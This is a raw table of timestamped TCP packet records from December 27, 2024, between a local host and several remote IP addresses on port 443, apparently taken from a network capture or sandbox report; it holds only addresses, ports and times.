Dec 27, 2024 07:10:47.848464966 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848536015 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.848553896 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848562002 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.848570108 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848644018 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.848674059 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848687887 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.848699093 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848768950 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.848783970 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848805904 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.848820925 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848839045 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.848860025 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848880053 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.848892927 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848941088 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.848953009 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848963976 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.848970890 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.848992109 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.848999023 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849023104 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849031925 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849055052 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849066973 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849092007 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849102020 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849119902 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849128008 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849140882 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849145889 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849169970 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849183083 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849194050 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849200964 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849234104 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849234104 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849262953 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849272966 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849292994 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849302053 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849328995 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849338055 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849351883 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849359989 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849409103 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849420071 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849447966 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849457026 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849478960 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849489927 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849504948 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849514961 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:47.849539042 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.849558115 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:47.891339064 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:48.181632042 CET	50029	443	192.168.2.5	20.110.205.119
Dec 27, 2024 07:10:48.181669950 CET	443	50029	20.110.205.119	192.168.2.5
Dec 27, 2024 07:10:48.181747913 CET	50029	443	192.168.2.5	20.110.205.119
Dec 27, 2024 07:10:48.182017088 CET	50029	443	192.168.2.5	20.110.205.119
Dec 27, 2024 07:10:48.182034969 CET	443	50029	20.110.205.119	192.168.2.5
Dec 27, 2024 07:10:48.443929911 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:48.443974018 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:48.444078922 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:48.444309950 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:48.444323063 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:48.649513006 CET	50031	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:48.649560928 CET	443	50031	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:48.649733067 CET	50031	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:48.649864912 CET	50032	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:48.649894953 CET	443	50032	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:48.650022984 CET	50032	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:48.650063992 CET	50031	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:48.650082111 CET	443	50031	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:48.650316954 CET	50032	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:48.650331974 CET	443	50032	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:48.651818037 CET	50033	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:48.651848078 CET	443	50033	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:48.651896000 CET	50033	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:48.652443886 CET	50033	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:48.652461052 CET	443	50033	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:48.652777910 CET	50034	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:48.652806997 CET	443	50034	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:48.652864933 CET	50034	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:48.653490067 CET	50034	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:48.653501987 CET	443	50034	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:48.974626064 CET	443	50016	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:48.974845886 CET	50016	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:48.974855900 CET	443	50016	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:48.976301908 CET	443	50016	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:48.976372957 CET	50016	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:48.977452040 CET	50016	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:48.977535009 CET	443	50016	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:48.977649927 CET	50016	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:48.977679968 CET	443	50016	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:48.977699041 CET	50016	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:48.977710962 CET	443	50016	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:49.032141924 CET	50016	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:49.272069931 CET	443	50028	108.139.47.108	192.168.2.5
Dec 27, 2024 07:10:49.272464991 CET	50028	443	192.168.2.5	108.139.47.108
Dec 27, 2024 07:10:49.272476912 CET	443	50028	108.139.47.108	192.168.2.5
Dec 27, 2024 07:10:49.272835970 CET	443	50028	108.139.47.108	192.168.2.5
Dec 27, 2024 07:10:49.273278952 CET	50028	443	192.168.2.5	108.139.47.108
Dec 27, 2024 07:10:49.273339987 CET	443	50028	108.139.47.108	192.168.2.5
Dec 27, 2024 07:10:49.273555040 CET	50028	443	192.168.2.5	108.139.47.108
Dec 27, 2024 07:10:49.315331936 CET	443	50028	108.139.47.108	192.168.2.5
Dec 27, 2024 07:10:49.443679094 CET	443	50016	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:49.443763018 CET	443	50016	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:49.443825960 CET	50016	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:49.444317102 CET	50016	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:49.444322109 CET	443	50016	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:49.718698978 CET	443	50028	108.139.47.108	192.168.2.5
Dec 27, 2024 07:10:49.718782902 CET	443	50028	108.139.47.108	192.168.2.5
Dec 27, 2024 07:10:49.718923092 CET	50028	443	192.168.2.5	108.139.47.108
Dec 27, 2024 07:10:49.719702005 CET	50028	443	192.168.2.5	108.139.47.108
Dec 27, 2024 07:10:49.719719887 CET	443	50028	108.139.47.108	192.168.2.5
Dec 27, 2024 07:10:49.719727993 CET	50028	443	192.168.2.5	108.139.47.108
Dec 27, 2024 07:10:49.719780922 CET	50028	443	192.168.2.5	108.139.47.108
Dec 27, 2024 07:10:49.759013891 CET	443	50029	20.110.205.119	192.168.2.5
Dec 27, 2024 07:10:49.759413958 CET	50029	443	192.168.2.5	20.110.205.119
Dec 27, 2024 07:10:49.759435892 CET	443	50029	20.110.205.119	192.168.2.5
Dec 27, 2024 07:10:49.759776115 CET	443	50029	20.110.205.119	192.168.2.5
Dec 27, 2024 07:10:49.760075092 CET	50029	443	192.168.2.5	20.110.205.119
Dec 27, 2024 07:10:49.760143995 CET	443	50029	20.110.205.119	192.168.2.5
Dec 27, 2024 07:10:49.760252953 CET	50029	443	192.168.2.5	20.110.205.119
Dec 27, 2024 07:10:49.803343058 CET	443	50029	20.110.205.119	192.168.2.5
Dec 27, 2024 07:10:50.099699974 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.100023031 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.101933956 CET	443	50031	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:50.103434086 CET	50031	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:50.103444099 CET	443	50031	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:50.104490042 CET	443	50031	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:50.104541063 CET	50031	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:50.104813099 CET	443	50032	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:50.106630087 CET	50031	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:50.106697083 CET	443	50031	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:50.106936932 CET	50032	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:50.106949091 CET	443	50032	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:50.111583948 CET	443	50032	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:50.111669064 CET	50032	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:50.112044096 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.112078905 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.113976955 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.113991022 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.114119053 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.114154100 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.114168882 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.114182949 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.114321947 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.114373922 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.114551067 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.114595890 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.114984989 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.115014076 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.115046024 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.115063906 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.115145922 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.115164042 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.115998030 CET	50032	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:50.116065979 CET	443	50032	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:50.159543991 CET	50032	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:50.159550905 CET	50031	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:50.159559011 CET	443	50032	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:50.159591913 CET	443	50031	23.44.201.37	192.168.2.5
Dec 27, 2024 07:10:50.175514936 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.175597906 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.175643921 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.175708055 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.200329065 CET	50012	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.200376987 CET	443	50012	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.213498116 CET	50032	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:50.213816881 CET	50031	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:10:50.436146021 CET	443	50029	20.110.205.119	192.168.2.5
Dec 27, 2024 07:10:50.436266899 CET	443	50029	20.110.205.119	192.168.2.5
Dec 27, 2024 07:10:50.436332941 CET	50029	443	192.168.2.5	20.110.205.119
Dec 27, 2024 07:10:50.437119961 CET	443	50033	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:50.439472914 CET	50033	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:50.439486027 CET	443	50033	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:50.439747095 CET	50029	443	192.168.2.5	20.110.205.119
Dec 27, 2024 07:10:50.439759970 CET	443	50029	20.110.205.119	192.168.2.5
Dec 27, 2024 07:10:50.440515041 CET	443	50033	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:50.440574884 CET	50033	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:50.441581011 CET	50033	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:50.441653013 CET	443	50033	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:50.453404903 CET	443	50034	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:50.453625917 CET	50034	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:50.453644037 CET	443	50034	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:50.454643011 CET	443	50034	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:50.454716921 CET	50034	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:50.455013037 CET	50034	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:50.455075979 CET	443	50034	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:50.488181114 CET	50033	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:50.488209963 CET	443	50033	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:50.503631115 CET	50034	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:50.503639936 CET	443	50034	204.79.197.219	192.168.2.5
Dec 27, 2024 07:10:50.535617113 CET	50033	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:50.551619053 CET	50034	443	192.168.2.5	204.79.197.219
Dec 27, 2024 07:10:50.683746099 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.683773041 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:50.684063911 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.684294939 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:50.684309006 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:51.909734011 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:51.909790039 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:51.909796000 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:51.909841061 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:51.979553938 CET	50030	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:51.979588985 CET	443	50030	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.108144999 CET	50048	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.108191013 CET	443	50048	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.108338118 CET	50048	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.108539104 CET	50048	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.108547926 CET	443	50048	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.133368015 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.133428097 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.134439945 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.134450912 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.136430979 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.136435986 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.136523962 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.136532068 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.136538029 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.136542082 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.140960932 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.140974998 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.141113997 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141184092 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.141298056 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141307116 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.141361952 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141407967 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141423941 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141428947 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.141436100 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.141443014 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.141506910 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141519070 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.141565084 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141583920 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.141639948 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141647100 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.141715050 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141746998 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.141808987 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141822100 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141858101 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141917944 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141930103 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141937017 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141954899 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141971111 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.141984940 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.142018080 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.183335066 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.183398008 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.183511972 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.183554888 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.183609009 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.183635950 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.183677912 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.183687925 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.183701038 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.183752060 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.183799028 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.227374077 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.227525949 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.227591038 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.227631092 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.227677107 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.227693081 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.227766037 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.275357962 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.275772095 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.319354057 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.381208897 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.381405115 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.381458044 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.381481886 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.381515980 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.381536007 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.381541967 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.381577015 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.384907961 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.384922028 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.385097027 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385107994 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385129929 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385169029 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385242939 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385276079 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385298014 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385308027 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385371923 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385394096 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385436058 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385492086 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385526896 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385544062 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385585070 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.385828972 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.431338072 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.431476116 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.432703972 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.432785034 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.432812929 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.432856083 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.432918072 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.433029890 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.433043957 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.433053017 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.475327015 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.475476027 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.501842022 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.501997948 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.502192974 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.502305984 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.502348900 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.502728939 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.543291092 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.543509007 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.543638945 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.543687105 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.543844938 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.543988943 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.544075966 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.544222116 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.544428110 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.560513973 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.560688972 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.560725927 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.591344118 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.622354031 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.622483015 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.622572899 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.622832060 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.622946978 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.623033047 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.662942886 CET	443	50043	188.245.216.205	192.168.2.5
